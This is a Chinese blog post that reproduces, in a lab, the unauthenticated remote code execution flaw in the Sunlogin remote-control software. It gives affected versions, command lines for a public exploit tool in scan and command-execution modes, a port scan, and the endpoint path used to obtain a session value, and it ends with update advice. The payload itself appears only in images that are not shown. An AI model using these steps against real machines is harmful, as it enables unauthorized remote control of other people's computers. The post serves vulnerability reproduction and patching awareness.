漏洞复现篇--向日葵远程命令代码执行

向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)

一、漏洞描述

向日葵是一款集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。向日葵远程控制软件存在未授权访问漏洞,启动服务端软件后,会开放未授权访问端口,攻击者可通过未授权访问无需密码直接获取session,并借此远程执行任意代码。

二、影响版本

向日葵个人版 for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

三、环境搭建

靶机:windows 192.168.101.140和向日葵的漏洞版本

image

四、漏洞复现

4.1 检测工具复现

https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

4.1.1 漏洞检测

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令

xrkRce.exe -h 192.168.101.140 -t scan

image

4.1.2 远程命令执行

xrkRce.exe -h 192.168.101.140 -t rce -p 扫描出的端口号 -c "执行的命令"

image

4.2 手动漏洞复现

4.2.1 使用Nmap或其它探测工具进行端口扫描

namp -A -p 40000-65535 192.168.101.140

image

4.2.2 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)对端口尝试

image

4.2.3 拿到CID-添加payload和cookie-发送

image

五、修复建议

向日葵官方已发布了修复版本,请及时更新:https://sunlogin.oray.com/

参考文章:
https://www.cnblogs.com/peace-and-romance/p/15905365.html

posted @ 2022-03-01 14:58  椰什么子  阅读(573)  评论(0)    收藏  举报